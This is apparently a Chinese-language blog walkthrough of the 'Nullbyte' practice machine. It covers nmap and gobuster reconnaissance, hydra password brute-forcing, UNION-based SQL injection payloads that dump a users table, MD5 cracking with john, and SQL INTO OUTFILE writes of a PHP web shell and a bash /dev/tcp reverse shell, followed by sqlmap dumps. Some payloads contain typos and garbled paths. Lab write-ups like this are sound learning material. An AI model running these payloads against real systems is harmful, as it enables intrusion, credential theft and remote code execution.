Nullbyte - SQL注入大赏

主机发现

sudo nmap -sT --min-rate 10000 -p- xx.xx.xx.xx -oA nmapscan/ports

sudo nmap -sT -sC -sV -O -p xx.xx.xx.xx -oA nmapscan/detail

sudo nmap -sU --top-ports 20 xx.xx.xx.xx -oA nmapscan/udp

sudo nmap -sU -p xx.xx.xx.xx 

sudo nmap --script=vuln -p xx.xx.xx.xx -oA nmapscan/vuln

网页渗透

尝试爆破目录

sudo gobuster -u http://xx.xx.xx.xx/ -w 

查看源代码发现了有一张图片main.gif 

wget下载图片http://xx.xx.xx.xx/main.gif 

查看图片是否有隐写信息

file main.gif 

exiftools main.gif

comment目录中发现有不一样的字符,可能是密码

但是这里怎么都没想到的是!!!这个竟然是网页的地址

拼接上目标机ip

http://xx.xx.xx.xx/KzMb5nVYJw进入到新的页面

 查看源代码

 他说密码不复杂通过hydra或者bp进行暴力破解

hydra xx.xx.xx.xx http-form-post "/KzMb5nVYJw/index.php:key=^PASS^:invalid key" -l  xx(此时爆破并不需要用户名,所以随便指定一个就可以) -P /usr/share/wordlists/rockyou.txt

爆破出xx /elite

进入到一个sql页面

 sql注入尝试

1.数据库猜解

通过构造不同的符号尝试报错

' -- -

)&+ -- -

" --> 报错

 猜有多少列

" union select 1,2,3;-- -  #直到能正常出现数据为止

查看数据库以及版本

" union select database(),@@version,user(); -- - #打三个横杠的时候需要证明--空格 为了突出空格

 指定seth读出字段

读出表

" union select database(),@@version,user(); -- -

" union select table_schema,table_name,3 from information_schema.tables;-- - #读出information_schema表中的tables这张表的table_schema和tablename 

会列出这个数据库内的所有数据库和数据库分别由什么表

mysql数据库存在的表

 phpmyadmin存在的表

或者重新构造一个表

" union select table_name,2,3 from information_schema where table_schema="seth"; -- -

 seth库存在的表

爆列名

" union select columus_name,2,3 from information_schema.columus where table_schema="seth" and table_name="users";-- -

爆字段

" union select user,pass from users;-- -

 发现一段base64编码,将其base64 -d解码后发现一段hash

利用hash-identifier进行辨明是md5

将md5保存到一个文件上

 利用hashcat或者john进行破解

john --format=raw-md5 --wordlists=/usr/share/wordlists/rockyou.txt hash_md5

 成功的出密码是omega再ssh登录

2.利用mysql写小马

" union select "<?php system($_GET['xx']);?>",2,3 into outfile "/var/www/html'/uploads/shell/php";-- -

报错

因为2,3不能写到文件中改成

" union select "<?php system($_GET['xx']);?>","",""  into outfile "/var/www/html'/uploads/shell/php";-- -

因为在我们提交页面的源代码里面将数据上传到的页面为420search.php,所以里面可能存在有数据库的配置文件

3.利用mysql写大马

" union select "<?php exec(\"bash -c 'bash -i >& /dev/tcp/kali's ip/port 0>&1'\");?>","","" into outfile '/var/www/html/upload

4.sqlmap

sqlmap -u http://xx.xx.xx.xx/xx/420search.php?usrtosearch=a" --dbms mysql --dbs

 sqlmap -u http://xx ..... " --dbms mysql -D seth --tables

sqlmap -u http://xx .... " --dbms mysql -D seth -T users --dump

 

posted @ 2023-05-08 11:55  lisenMiller  阅读(52)  评论(0编辑  收藏  举报